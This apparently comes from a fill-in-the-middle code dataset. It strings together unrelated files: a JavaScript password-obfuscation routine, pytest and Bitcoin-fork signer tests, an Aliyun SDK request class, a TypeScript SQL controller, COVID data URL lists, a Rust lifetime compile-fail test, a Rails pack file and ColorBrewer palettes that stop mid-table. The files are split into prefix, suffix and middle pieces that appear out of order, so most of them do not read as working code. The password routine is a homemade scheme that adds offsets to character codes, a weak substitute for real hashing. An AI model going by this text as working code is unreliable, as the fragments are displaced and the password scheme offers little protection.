while(tkeeper.length != 200){ //181000 - 3mins 1s 301000 - 5mins 01s 61000 - 1mins 1s
await sleep(1);
tkeeper[k] = (new Date().getTime())*didcx_random_number_generator(5, 103);
if(tkeeper.length == 200){
var tr = didcx_random_number_generator(0, tkeeper.length-1);
tc = tkeeper[tr];
//window.console.log($password);
Passphrase($password, $repeatPassword);
break;
return;
}else{
window.__sleep = window.__sleep + 1;
}
k++;
}
}
function TK($password, $repeatPassword){
//window.console.log($password);
tkeeper[k] = didcx_random_number_generator(5, 57553689829132);
if(tkeeper.length == 6000){
var tr = didcx_random_number_generator(0, tkeeper.length-1);
tc = tkeeper[tr];
psw = $password;
rpsw = $repeatPassword;
//window.console.log($password);
//Passphrase($password, $repeatPassword);
return;
}else{
k++;
return TK($password, $repeatPassword);
}
//sleepMode2($password, $repeatPassword, 121000, null);
}
var pass, pass2, pks;
var p3, pkeek;
function Passphrase($password, $repeatPassword){
if($password == $repeatPassword){
//window.console.log($password);
//$password = $password.value.toString().trim();
//let $password = $password;//"HELLOWORLD";//"1010";//"HELLOWORLD";
var rk = didcx_random_number_generator(0, rans.length-1);
var rpk = rans[rk];
var sk = 0;
var passcodes = [], passcodes2 = [], passcodes3 = [];
if(rpk%2 == 1){
sk = rpk;
}
else{
return Passphrase($password, $repeatPassword);
}
//window.console.log($password);
//return $password;
for(var i = 0;i < $password.length;i++){
passcodes[i] = $password.charCodeAt(i)+sk;
}
dd = new Date();
TK($password, $repeatPassword);
trand(tc, 0, tkeeper);
var TTL = (tc-didcx_random_number_generator(1, 575536898291)) - riv;
tkeeper[didcx_random_number_generator(0, tkeeper.length-1)] = TTL;
for(var i = 0;i < $password.length;i++){
passcodes2[i] = ((passcodes[i]+TTL)+2147483647)+Number(getCookieValue("TTLIP"));
}
for(var i = 0;i < $password.length;i++){
passcodes3[i] = (Math.trunc(Math.floor((passcodes2[i]))));
}
    // 126 independent empty sub-arrays, one slot per possible password character.
    pass = [], pass2 = Array.from({length: 126}, () => []);
    p3 = Array.from({length: 126}, () => []);
pkeek = [];
pass = converter(passcodes3, pass, pass2, p3);
var pks = [TTL, sk];
$uid = JSON.stringify(pass);
$psk = JSON.stringify(pks);
//ListenOnSignIn();
//ListenOnSignUp();
}else{
return "dd;d;d";
}
}
function converter(array = [], pass = [], pass2 = [], pass3 = []){
for(var g = 0;g < array.length;g++){
var garbage = ['@', '#', '!', '$', '%', '^', '&', '*', '(', ')', '-', '_', '+', '=', '[', ']', '|', '`', '~'];
var str = array[g].toString()+'@';
for(var k = 0; k < str.length;k++){
if(str[k] == '@'){
p3[g][k] = str[k];
pass2[g][k] = str[k];
}else{
p3[g][k] = str[k];
pass2[g][k] = String.fromCharCode(str[k]);
}
}
}
for(var g = 0;g < array.length;g++){
pkeek[g] = [[p3[g]]];
pass[g] = [[pass2[g]]];
}
return pass;
} | RK |
conftest.py | import pytest
import json
from os import path
from fixture.fixture import Fixture
with open(path.join(path.dirname(path.abspath(__file__)), 'config.json')) as f:
config = json.load(f)
@pytest.fixture(scope="session")
def app(request):
| fixture = Fixture(admin_root=config['admin']['url'],
admin_countries_url=config['admin']['countries_url'],
admin_zones_url=config['admin']['zones_url'],
admin_catalog_url=config['admin']['catalog_url'],
admin_name=config['admin']['name'],
admin_password=config['admin']['password'],
shop_root=config['shop']['url'])
request.addfinalizer(fixture.destroy)
return fixture |
|
mod.rs |
mod icon_plugin;
mod vscode;
pub use {
icon_plugin::IconPlugin,
};
pub fn | (icon_set: &str) -> Option<Box<dyn IconPlugin + Send + Sync>> {
match icon_set {
"vscode" => Some(Box::new(vscode::VsCodeIconPlugin::new())),
_ => None,
}
}
| icon_plugin |
rpc_signer.py | #!/usr/bin/env python3
# Copyright (c) 2017-2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test external signer.
Verify that a blinkhashd node can use an external signer command.
See also wallet_signer.py for tests that require wallet context.
"""
import os
import platform
from test_framework.test_framework import BlinkhashTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
)
class RPCSignerTest(BlinkhashTestFramework):
def mock_signer_path(self):
path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'mocks', 'signer.py')
if platform.system() == "Windows":
return "py " + path
else:
return path
def set_test_params(self):
self.num_nodes = 4
self.extra_args = [
[],
[f"-signer={self.mock_signer_path()}", '-keypool=10'],
[f"-signer={self.mock_signer_path()}", '-keypool=10'],
["-signer=fake.py"],
]
def skip_test_if_missing_module(self):
self.skip_if_no_external_signer()
def set_mock_result(self, node, res):
with open(os.path.join(node.cwd, "mock_result"), "w", encoding="utf8") as f:
f.write(res)
def clear_mock_result(self, node):
os.remove(os.path.join(node.cwd, "mock_result"))
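    # set_mock_result/clear_mock_result drive mocks/signer.py: judging from the
    # calls below, the first token of mock_result is treated as the script's
    # exit status and the remainder (if any) as its stdout.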
def run_test(self):
self.log.debug(f"-signer={self.mock_signer_path()}")
assert_raises_rpc_error(-1, 'Error: restart blinkhashd with -signer=<cmd>',
self.nodes[0].enumeratesigners
)
# Handle script missing:
assert_raises_rpc_error(-1, 'execve failed: No such file or directory',
self.nodes[3].enumeratesigners
)
# Handle error thrown by script
self.set_mock_result(self.nodes[1], "2")
assert_raises_rpc_error(-1, 'RunCommandParseJSON error',
self.nodes[1].enumeratesigners
)
self.clear_mock_result(self.nodes[1])
self.set_mock_result(self.nodes[1], '0 [{"type": "trezor", "model": "trezor_t", "error": "fingerprint not found"}]')
assert_raises_rpc_error(-1, 'fingerprint not found',
self.nodes[1].enumeratesigners
)
self.clear_mock_result(self.nodes[1])
result = self.nodes[1].enumeratesigners()
assert_equal(len(result['signers']), 2) | assert_equal(result['signers'][0]["name"], "trezor_t")
if __name__ == '__main__':
RPCSignerTest().main() | assert_equal(result['signers'][0]["fingerprint"], "00000001") |
DescribeNotificationConfigurationsRequest.py | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkess.endpoint import endpoint_data
class DescribeNotificationConfigurationsRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'Ess', '2014-08-28', 'DescribeNotificationConfigurations','ess')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_ResourceOwnerAccount(self):
return self.get_query_params().get('ResourceOwnerAccount')
def set_ResourceOwnerAccount(self,ResourceOwnerAccount):
self.add_query_param('ResourceOwnerAccount',ResourceOwnerAccount)
def get_ScalingGroupId(self):
return self.get_query_params().get('ScalingGroupId')
def | (self,ScalingGroupId):
self.add_query_param('ScalingGroupId',ScalingGroupId)
def get_OwnerId(self):
return self.get_query_params().get('OwnerId')
def set_OwnerId(self,OwnerId):
self.add_query_param('OwnerId',OwnerId) | set_ScalingGroupId |
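A minimal usage sketch for this request class; the credentials, region, and scaling group ID below are placeholders, and do_action_with_exception is the usual aliyunsdkcore entry point:
from aliyunsdkcore.client import AcsClient

# Placeholder credentials and region; supply real values.
client = AcsClient('<access-key-id>', '<access-key-secret>', 'cn-hangzhou')

request = DescribeNotificationConfigurationsRequest()
request.set_ScalingGroupId('asg-xxxxxxxx')  # placeholder scaling group ID

# Performs the RPC call and returns the raw JSON response body.
response = client.do_action_with_exception(request)
print(response)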
moduleController.ts | import mysql from 'mysql';
import express, {Request, Response, urlencoded} from 'express';
| let sql = `SELECT * FROM module JOIN coursemodule ON module.module_id = coursemodule.module_id AND coursemodule.course_id = ?`;
// Use a parameter placeholder instead of string interpolation to avoid SQL injection.
db.query(sql, [course_id], (err: any, result: any) => {
if (err) {
console.log(err);
return res.status(500).send(err);
}
res.send(result);
});
}); | import db from '../config/config';
export const getModuleforCourse = ((req: Request, res: Response) => {
let course_id = req.params.id;
|
UrlList.js | // src/network/UrlList.js
const BASE_URL = 'https://master-covid-19-api-laeyoung.endpoint.ainize.ai/';
const API_BASE_URL = BASE_URL + 'jhu-edu';
const BASE_URL_PCM = 'https://raw.githubusercontent.com/pcm-dpc/COVID-19/master/dati-json';
const UrlList = {
/**
* Your App's URLs
*/
Corona: {
getBriefUrl: () => {
return `${API_BASE_URL}/brief`;
},
getLatestUrl: () => {
return `${API_BASE_URL}/latest`;
},
getTimeseriesUrl: () => {
return `${API_BASE_URL}/timeseries`;
},
getNazioneUrl: () => {
return `${BASE_URL_PCM}/dpc-covid19-ita-andamento-nazionale.json`;
},
getRegioniUrl: () => {
return `${BASE_URL_PCM}/dpc-covid19-ita-regioni.json`;
},
getProvinceUrl: () => {
return `${BASE_URL_PCM}/dpc-covid19-ita-province.json`;
},
getSpainUrl: () => {
return 'https://raw.githubusercontent.com/victorvicpal/COVID19_es/master/data/csv_data/data/dataCOVID19_es.csv';
}
},
}
| module.exports = UrlList; |
|
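A quick smoke test of one of the URLs built above, sketched in Python; the response keys named in the comment are assumptions about the jhu-edu API, not taken from this file:
import requests

# UrlList.Corona.getBriefUrl() resolves to this URL.
brief_url = "https://master-covid-19-api-laeyoung.endpoint.ainize.ai/jhu-edu/brief"
data = requests.get(brief_url, timeout=10).json()
print(data)  # expected keys (assumed): "confirmed", "deaths", "recovered"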
ex1-return-one-existing-name-if-else.rs | fn main() { } | fn foo<'a>(x: &'a i32, y: &i32) -> &'a i32 {
if x > y { x } else { y } //~ ERROR explicit lifetime
}
|
|
application.js | // This file is automatically compiled by Webpack, along with any other files
// present in this directory. You're encouraged to place your actual application logic in
// a relevant structure within app/javascript and only use these pack files to reference
// that code so it'll be compiled.
import Rails from "@rails/ujs"
import Turbolinks from "turbolinks"
import * as ActiveStorage from "@rails/activestorage" | import "channels"
Rails.start()
Turbolinks.start()
ActiveStorage.start() | |
colorbrewer.js | // This product includes color specifications and designs developed by Cynthia Brewer (http://colorbrewer.org/).
// JavaScript specs as packaged in the D3 library (d3js.org). Please see license at http://colorbrewer.org/export/LICENSE.txt
var colorbrewer = {YlGn: {
3: ["#f7fcb9","#addd8e","#31a354"],
4: ["#ffffcc","#c2e699","#78c679","#238443"],
5: ["#ffffcc","#c2e699","#78c679","#31a354","#006837"],
6: ["#ffffcc","#d9f0a3","#addd8e","#78c679","#31a354","#006837"],
7: ["#ffffcc","#d9f0a3","#addd8e","#78c679","#41ab5d","#238443","#005a32"],
8: ["#ffffe5","#f7fcb9","#d9f0a3","#addd8e","#78c679","#41ab5d","#238443","#005a32"],
9: ["#ffffe5","#f7fcb9","#d9f0a3","#addd8e","#78c679","#41ab5d","#238443","#006837","#004529"]
},YlGnBu: {
3: ["#edf8b1","#7fcdbb","#2c7fb8"],
4: ["#ffffcc","#a1dab4","#41b6c4","#225ea8"],
5: ["#ffffcc","#a1dab4","#41b6c4","#2c7fb8","#253494"],
6: ["#ffffcc","#c7e9b4","#7fcdbb","#41b6c4","#2c7fb8","#253494"],
7: ["#ffffcc","#c7e9b4","#7fcdbb","#41b6c4","#1d91c0","#225ea8","#0c2c84"],
8: ["#ffffd9","#edf8b1","#c7e9b4","#7fcdbb","#41b6c4","#1d91c0","#225ea8","#0c2c84"],
9: ["#ffffd9","#edf8b1","#c7e9b4","#7fcdbb","#41b6c4","#1d91c0","#225ea8","#253494","#081d58"]
},GnBu: {
3: ["#e0f3db","#a8ddb5","#43a2ca"],
4: ["#f0f9e8","#bae4bc","#7bccc4","#2b8cbe"],
5: ["#f0f9e8","#bae4bc","#7bccc4","#43a2ca","#0868ac"],
6: ["#f0f9e8","#ccebc5","#a8ddb5","#7bccc4","#43a2ca","#0868ac"],
7: ["#f0f9e8","#ccebc5","#a8ddb5","#7bccc4","#4eb3d3","#2b8cbe","#08589e"],
8: ["#f7fcf0","#e0f3db","#ccebc5","#a8ddb5","#7bccc4","#4eb3d3","#2b8cbe","#08589e"],
9: ["#f7fcf0","#e0f3db","#ccebc5","#a8ddb5","#7bccc4","#4eb3d3","#2b8cbe","#0868ac","#084081"]
},BuGn: {
3: ["#e5f5f9","#99d8c9","#2ca25f"],
4: ["#edf8fb","#b2e2e2","#66c2a4","#238b45"],
5: ["#edf8fb","#b2e2e2","#66c2a4","#2ca25f","#006d2c"],
6: ["#edf8fb","#ccece6","#99d8c9","#66c2a4","#2ca25f","#006d2c"],
7: ["#edf8fb","#ccece6","#99d8c9","#66c2a4","#41ae76","#238b45","#005824"],
8: ["#f7fcfd","#e5f5f9","#ccece6","#99d8c9","#66c2a4","#41ae76","#238b45","#005824"],
9: ["#f7fcfd","#e5f5f9","#ccece6","#99d8c9","#66c2a4","#41ae76","#238b45","#006d2c","#00441b"]
},PuBuGn: {
3: ["#ece2f0","#a6bddb","#1c9099"],
4: ["#f6eff7","#bdc9e1","#67a9cf","#02818a"],
5: ["#f6eff7","#bdc9e1","#67a9cf","#1c9099","#016c59"],
6: ["#f6eff7","#d0d1e6","#a6bddb","#67a9cf","#1c9099","#016c59"],
7: ["#f6eff7","#d0d1e6","#a6bddb","#67a9cf","#3690c0","#02818a","#016450"],
8: ["#fff7fb","#ece2f0","#d0d1e6","#a6bddb","#67a9cf","#3690c0","#02818a","#016450"],
9: ["#fff7fb","#ece2f0","#d0d1e6","#a6bddb","#67a9cf","#3690c0","#02818a","#016c59","#014636"]
},PuBu: {
3: ["#ece7f2","#a6bddb","#2b8cbe"],
4: ["#f1eef6","#bdc9e1","#74a9cf","#0570b0"],
5: ["#f1eef6","#bdc9e1","#74a9cf","#2b8cbe","#045a8d"],
6: ["#f1eef6","#d0d1e6","#a6bddb","#74a9cf","#2b8cbe","#045a8d"],
7: ["#f1eef6","#d0d1e6","#a6bddb","#74a9cf","#3690c0","#0570b0","#034e7b"],
8: ["#fff7fb","#ece7f2","#d0d1e6","#a6bddb","#74a9cf","#3690c0","#0570b0","#034e7b"],
9: ["#fff7fb","#ece7f2","#d0d1e6","#a6bddb","#74a9cf","#3690c0","#0570b0","#045a8d","#023858"]
},BuPu: {
3: ["#e0ecf4","#9ebcda","#8856a7"],
4: ["#edf8fb","#b3cde3","#8c96c6","#88419d"],
5: ["#edf8fb","#b3cde3","#8c96c6","#8856a7","#810f7c"],
6: ["#edf8fb","#bfd3e6","#9ebcda","#8c96c6","#8856a7","#810f7c"],
7: ["#edf8fb","#bfd3e6","#9ebcda","#8c96c6","#8c6bb1","#88419d","#6e016b"],
8: ["#f7fcfd","#e0ecf4","#bfd3e6","#9ebcda","#8c96c6","#8c6bb1","#88419d","#6e016b"],
9: ["#f7fcfd","#e0ecf4","#bfd3e6","#9ebcda","#8c96c6","#8c6bb1","#88419d","#810f7c","#4d004b"]
},RdPu: {
3: ["#fde0dd","#fa9fb5","#c51b8a"],
4: ["#feebe2","#fbb4b9","#f768a1","#ae017e"],
5: ["#feebe2","#fbb4b9","#f768a1","#c51b8a","#7a0177"],
6: ["#feebe2","#fcc5c0","#fa9fb5","#f768a1","#c51b8a","#7a0177"],
7: ["#feebe2","#fcc5c0","#fa9fb5","#f768a1","#dd3497","#ae017e","#7a0177"],
8: ["#fff7f3","#fde0dd","#fcc5c0","#fa9fb5","#f768a1","#dd3497","#ae017e","#7a0177"],
9: ["#fff7f3","#fde0dd","#fcc5c0","#fa9fb5","#f768a1","#dd3497","#ae017e","#7a0177","#49006a"]
},PuRd: {
3: ["#e7e1ef","#c994c7","#dd1c77"],
4: ["#f1eef6","#d7b5d8","#df65b0","#ce1256"],
5: ["#f1eef6","#d7b5d8","#df65b0","#dd1c77","#980043"],
6: ["#f1eef6","#d4b9da","#c994c7","#df65b0","#dd1c77","#980043"],
7: ["#f1eef6","#d4b9da","#c994c7","#df65b0","#e7298a","#ce1256","#91003f"],
8: ["#f7f4f9","#e7e1ef","#d4b9da","#c994c7","#df65b0","#e7298a","#ce1256","#91003f"],
9: ["#f7f4f9","#e7e1ef","#d4b9da","#c994c7","#df65b0","#e7298a","#ce1256","#980043","#67001f"]
},OrRd: {
3: ["#fee8c8","#fdbb84","#e34a33"],
4: ["#fef0d9","#fdcc8a","#fc8d59","#d7301f"],
5: ["#fef0d9","#fdcc8a","#fc8d59","#e34a33","#b30000"],
6: ["#fef0d9","#fdd49e","#fdbb84","#fc8d59","#e34a33","#b30000"],
7: ["#fef0d9","#fdd49e","#fdbb84","#fc8d59","#ef6548","#d7301f","#990000"],
8: ["#fff7ec","#fee8c8","#fdd49e","#fdbb84","#fc8d59","#ef6548","#d7301f","#990000"],
9: ["#fff7ec","#fee8c8","#fdd49e","#fdbb84","#fc8d59","#ef6548","#d7301f","#b30000","#7f0000"]
},YlOrRd: {
3: ["#ffeda0","#feb24c","#f03b20"],
4: ["#ffffb2","#fecc5c","#fd8d3c","#e31a1c"],
5: ["#ffffb2","#fecc5c","#fd8d3c","#f03b20","#bd0026"],
6: ["#ffffb2","#fed976","#feb24c","#fd8d3c","#f03b20","#bd0026"],
7: ["#ffffb2","#fed976","#feb24c","#fd8d3c","#fc4e2a","#e31a1c","#b10026"],
8: ["#ffffcc","#ffeda0","#fed976","#feb24c","#fd8d3c","#fc4e2a","#e31a1c","#b10026"],
9: ["#ffffcc","#ffeda0","#fed976","#feb24c","#fd8d3c","#fc4e2a","#e31a1c","#bd0026","#800026"]
},YlOrBr: {
3: ["#fff7bc","#fec44f","#d95f0e"],
4: ["#ffffd4","#fed98e","#fe9929","#cc4c02"],
5: ["#ffffd4","#fed98e","#fe9929","#d95f0e","#993404"],
6: ["#ffffd4","#fee391","#fec44f","#fe9929","#d95f0e","#993404"],
7: ["#ffffd4","#fee391","#fec44f","#fe9929","#ec7014","#cc4c02","#8c2d04"],
8: ["#ffffe5","#fff7bc","#fee391","#fec44f","#fe9929","#ec7014","#cc4c02","#8c2d04"],
9: ["#ffffe5","#fff7bc","#fee391","#fec44f","#fe9929","#ec7014","#cc4c02","#993404","#662506"]
},Purples: {
3: ["#efedf5","#bcbddc","#756bb1"],
4: ["#f2f0f7","#cbc9e2","#9e9ac8","#6a51a3"],
5: ["#f2f0f7","#cbc9e2","#9e9ac8","#756bb1","#54278f"],
6: ["#f2f0f7","#dadaeb","#bcbddc","#9e9ac8","#756bb1","#54278f"],
7: ["#f2f0f7","#dadaeb","#bcbddc","#9e9ac8","#807dba","#6a51a3","#4a1486"],
8: ["#fcfbfd","#efedf5","#dadaeb","#bcbddc","#9e9ac8","#807dba","#6a51a3","#4a1486"],
9: ["#fcfbfd","#efedf5","#dadaeb","#bcbddc","#9e9ac8","#807dba","#6a51a3","#54278f","#3f007d"]
},Blues: {
3: ["#deebf7","#9ecae1","#3182bd"],
4: ["#eff3ff","#bdd7e7","#6baed6","#2171b5"],
5: ["#eff3ff","#bdd7e7","#6baed6","#3182bd","#08519c"],
6: ["#eff3ff","#c6dbef","#9ecae1","#6baed6","#3182bd","#08519c"],
7: ["#eff3ff","#c6dbef","#9ecae1","#6baed6","#4292c6","#2171b5","#084594"],
8: ["#f7fbff","#deebf7","#c6dbef","#9ecae1","#6baed6","#4292c6","#2171b5","#084594"],
9: ["#f7fbff","#deebf7","#c6dbef","#9ecae1","#6baed6","#4292c6","#2171b5","#08519c","#08306b"]
},Greens: {
3: ["#e5f5e0","#a1d99b","#31a354"],
4: ["#edf8e9","#bae4b3","#74c476","#238b45"],
5: ["#edf8e9","#bae4b3","#74c476","#31a354","#006d2c"],
6: ["#edf8e9","#c7e9c0","#a1d99b","#74c476","#31a354","#006d2c"],
7: ["#edf8e9","#c7e9c0","#a1d99b","#74c476","#41ab5d","#238b45","#005a32"],
8: ["#f7fcf5","#e5f5e0","#c7e9c0","#a1d99b","#74c476","#41ab5d","#238b45","#005a32"],
9: ["#f7fcf5","#e5f5e0","#c7e9c0","#a1d99b","#74c476","#41ab5d","#238b45","#006d2c","#00441b"]
},Oranges: {
3: ["#fee6ce","#fdae6b","#e6550d"],
4: ["#feedde","#fdbe85","#fd8d3c","#d94701"],
5: ["#feedde","#fdbe85","#fd8d3c","#e6550d","#a63603"],
6: ["#feedde","#fdd0a2","#fdae6b","#fd8d3c","#e6550d","#a63603"],
7: ["#feedde","#fdd0a2","#fdae6b","#fd8d3c","#f16913","#d94801","#8c2d04"],
8: ["#fff5eb","#fee6ce","#fdd0a2","#fdae6b","#fd8d3c","#f16913","#d94801","#8c2d04"],
9: ["#fff5eb","#fee6ce","#fdd0a2","#fdae6b","#fd8d3c","#f16913","#d94801","#a63603","#7f2704"]
},Reds: {
3: ["#fee0d2","#fc9272","#de2d26"],
4: ["#fee5d9","#fcae91","#fb6a4a","#cb181d"],
5: ["#fee5d9","#fcae91","#fb6a4a","#de2d26","#a50f15"], | 8: ["#fff5f0","#fee0d2","#fcbba1","#fc9272","#fb6a4a","#ef3b2c","#cb181d","#99000d"],
9: ["#fff5f0","#fee0d2","#fcbba1","#fc9272","#fb6a4a","#ef3b2c","#cb181d","#a50f15","#67000d"]
},Greys: {
3: ["#f0f0f0","#bdbdbd","#636363"],
4: ["#f7f7f7","#cccccc","#969696","#525252"],
5: ["#f7f7f7","#cccccc","#969696","#636363","#252525"],
6: ["#f7f7f7","#d9d9d9","#bdbdbd","#969696","#636363","#252525"],
7: ["#f7f7f7","#d9d9d9","#bdbdbd","#969696","#737373","#525252","#252525"],
8: ["#ffffff","#f0f0f0","#d9d9d9","#bdbdbd","#969696","#737373","#525252","#252525"],
9: ["#ffffff","#f0f0f0","#d9d9d9","#bdbdbd","#969696","#737373","#525252","#252525","#000000"]
},PuOr: {
3: ["#f1a340","#f7f7f7","#998ec3"],
4: ["#e66101","#fdb863","#b2abd2","#5e3c99"],
5: ["#e66101","#fdb863","#f7f7f7","#b2abd2","#5e3c99"],
6: ["#b35806","#f1a340","#fee0b6","#d8daeb","#998ec3","#542788"],
7: ["#b35806","#f1a340","#fee0b6","#f7f7f7","#d8daeb","#998ec3","#542788"],
8: ["#b35806","#e08214","#fdb863","#fee0b6","#d8daeb","#b2abd2","#8073ac","#542788"],
9: ["#b35806","#e08214","#fdb863","#fee0b6","#f7f7f7","#d8daeb","#b2abd2","#8073ac","#542788"],
10: ["#7f3b08","#b35806","#e08214","#fdb863","#fee0b6","#d8daeb","#b2abd2","#8073ac","#542788","#2d004b"],
11: ["#7f3b08","#b35806","#e08214","#fdb863","#fee0b6","#f7f7f7","#d8daeb","#b2abd2","#8073ac","#542788","#2d004b"]
},BrBG: {
3: ["#d8b365","#f5f5f5","#5ab4ac"],
4: ["#a6611a","#dfc27d","#80cdc1","#018571"],
5: ["#a6611a","#dfc27d","#f5f5f5","#80cdc1","#018571"],
6: ["#8c510a","#d8b365","#f6e8c3","#c7eae5","#5ab4ac","#01665e"],
7: ["#8c510a","#d8b365","#f6e8c3","#f5f5f5","#c7eae5","#5ab4ac","#01665e"],
8: ["#8c510a","#bf812d","#dfc27d","#f6e8c3","#c7eae5","#80cdc1","#35978f","#01665e"],
9: ["#8c510a","#bf812d","#dfc27d","#f6e8c3","#f5f5f5","#c7eae5","#80cdc1","#35978f","#01665e"],
10: ["#543005","#8c510a","#bf812d","#dfc27d","#f6e8c3","#c7eae5","#80cdc1","#35978f","#01665e","#003c30"],
11: ["#543005","#8c510a","#bf812d","#dfc27d","#f6e8c3","#f5f5f5","#c7eae5","#80cdc1","#35978f","#01665e","#003c30"]
},PRGn: {
3: ["#af8dc3","#f7f7f7","#7fbf7b"],
4: ["#7b3294","#c2a5cf","#a6dba0","#008837"],
5: ["#7b3294","#c2a5cf","#f7f7f7","#a6dba0","#008837"],
6: ["#762a83","#af8dc3","#e7d4e8","#d9f0d3","#7fbf7b","#1b7837"],
7: ["#762a83","#af8dc3","#e7d4e8","#f7f7f7","#d9f0d3","#7fbf7b","#1b7837"],
8: ["#762a83","#9970ab","#c2a5cf","#e7d4e8","#d9f0d3","#a6dba0","#5aae61","#1b7837"],
9: ["#762a83","#9970ab","#c2a5cf","#e7d4e8","#f7f7f7","#d9f0d3","#a6dba0","#5aae61","#1b7837"],
10: ["#40004b","#762a83","#9970ab","#c2a5cf","#e7d4e8","#d9f0d3","#a6dba0","#5aae61","#1b7837","#00441b"],
11: ["#40004b","#762a83","#9970ab","#c2a5cf","#e7d4e8","#f7f7f7","#d9f0d3","#a6dba0","#5aae61","#1b7837","#00441b"]
},PiYG: {
3: ["#e9a3c9","#f7f7f7","#a1d76a"],
4: ["#d01c8b","#f1b6da","#b8e186","#4dac26"],
5: ["#d01c8b","#f1b6da","#f7f7f7","#b8e186","#4dac26"],
6: ["#c51b7d","#e9a3c9","#fde0ef","#e6f5d0","#a1d76a","#4d9221"],
7: ["#c51b7d","#e9a3c9","#fde0ef","#f7f7f7","#e6f5d0","#a1d76a","#4d9221"],
8: ["#c51b7d","#de77ae","#f1b6da","#fde0ef","#e6f5d0","#b8e186","#7fbc41","#4d9221"],
9: ["#c51b7d","#de77ae","#f1b6da","#fde0ef","#f7f7f7","#e6f5d0","#b8e186","#7fbc41","#4d9221"],
10: ["#8e0152","#c51b7d","#de77ae","#f1b6da","#fde0ef","#e6f5d0","#b8e186","#7fbc41","#4d9221","#276419"],
11: ["#8e0152","#c51b7d","#de77ae","#f1b6da","#fde0ef","#f7f7f7","#e6f5d0","#b8e186","#7fbc41","#4d9221","#276419"]
},RdBu: {
3: ["#ef8a62","#f7f7f7","#67a9cf"],
4: ["#ca0020","#f4a582","#92c5de","#0571b0"],
5: ["#ca0020","#f4a582","#f7f7f7","#92c5de","#0571b0"],
6: ["#b2182b","#ef8a62","#fddbc7","#d1e5f0","#67a9cf","#2166ac"],
7: ["#b2182b","#ef8a62","#fddbc7","#f7f7f7","#d1e5f0","#67a9cf","#2166ac"],
8: ["#b2182b","#d6604d","#f4a582","#fddbc7","#d1e5f0","#92c5de","#4393c3","#2166ac"],
9: ["#b2182b","#d6604d","#f4a582","#fddbc7","#f7f7f7","#d1e5f0","#92c5de","#4393c3","#2166ac"],
10: ["#67001f","#b2182b","#d6604d","#f4a582","#fddbc7","#d1e5f0","#92c5de","#4393c3","#2166ac","#053061"],
11: ["#67001f","#b2182b","#d6604d","#f4a582","#fddbc7","#f7f7f7","#d1e5f0","#92c5de","#4393c3","#2166ac","#053061"]
},RdGy: {
3: ["#ef8a62","#ffffff","#999999"],
4: ["#ca0020","#f4a582","#bababa","#404040"],
5: ["#ca0020","#f4a582","#ffffff","#bababa","#404040"],
6: ["#b2182b","#ef8a62","#fddbc7","#e0e0e0","#999999","#4d4d4d"],
7: ["#b2182b","#ef8a62","#fddbc7","#ffffff","#e0e0e0","#999999","#4d4d4d"],
8: ["#b2182b","#d6604d","#f4a582","#fddbc7","#e0e0e0","#bababa","#878787","#4d4d4d"],
9: ["#b2182b","#d6604d","#f4a582","#fddbc7","#ffffff","#e0e0e0","#bababa","#878787","#4d4d4d"],
10: ["#67001f","#b2182b","#d6604d","#f4a582","#fddbc7","#e0e0e0","#bababa","#878787","#4d4d4d","#1a1a1a"],
11: ["#67001f","#b2182b","#d6604d","#f4a582","#fddbc7","#ffffff","#e0e0e0","#bababa","#878787","#4d4d4d","#1a1a1a"]
},RdYlBu: {
3: ["#fc8d59","#ffffbf","#91bfdb"],
4: ["#d7191c","#fdae61","#abd9e9","#2c7bb6"],
5: ["#d7191c","#fdae61","#ffffbf","#abd9e9","#2c7bb6"],
6: ["#d73027","#fc8d59","#fee090","#e0f3f8","#91bfdb","#4575b4"],
7: ["#d73027","#fc8d59","#fee090","#ffffbf","#e0f3f8","#91bfdb","#4575b4"],
8: ["#d73027","#f46d43","#fdae61","#fee090","#e0f3f8","#abd9e9","#74add1","#4575b4"],
9: ["#d73027","#f46d43","#fdae61","#fee090","#ffffbf","#e0f3f8","#abd9e9","#74add1","#4575b4"],
10: ["#a50026","#d73027","#f46d43","#fdae61","#fee090","#e0f3f8","#abd9e9","#74add1","#4575b4","#313695"],
11: ["#a50026","#d73027","#f46d43","#fdae61","#fee090","#ffffbf","#e0f3f8","#abd9e9","#74add1","#4575b4","#313695"]
},Spectral: {
3: ["#fc8d59","#ffffbf","#99d594"],
4: ["#d7191c","#fdae61","#abdda4","#2b83ba"],
5: ["#d7191c","#fdae61","#ffffbf","#abdda4","#2b83ba"],
6: ["#d53e4f","#fc8d59","#fee08b","#e6f598","#99d594","#3288bd"],
7: ["#d53e4f","#fc8d59","#fee08b","#ffffbf","#e6f598","#99d594","#3288bd"],
8: ["#d53e4f","#f46d43","#fdae61","#fee08b","#e6f598","#abdda4","#66c2a5","#3288bd"],
9: ["#d53e4f","#f46d43","#fdae61","#fee08b","#ffffbf","#e6f598","#abdda4","#66c2a5","#3288bd"],
10: ["#9e0142","#d53e4f","#f46d43","#fdae61","#fee08b","#e6f598","#abdda4","#66c2a5","#3288bd","#5e4fa2"],
11: ["#9e0142","#d53e4f","#f46d43","#fdae61","#fee08b","#ffffbf","#e6f598","#abdda4","#66c2a5","#3288bd","#5e4fa2"]
},RdYlGn: {
3: ["#fc8d59","#ffffbf","#91cf60"],
4: ["#d7191c","#fdae61","#a6d96a","#1a9641"],
5: ["#d7191c","#fdae61","#ffffbf","#a6d96a","#1a9641"],
6: ["#d73027","#fc8d59","#fee08b","#d9ef8b","#91cf60","#1a9850"],
7: ["#d73027","#fc8d59","#fee08b","#ffffbf","#d9ef8b","#91cf60","#1a9850"],
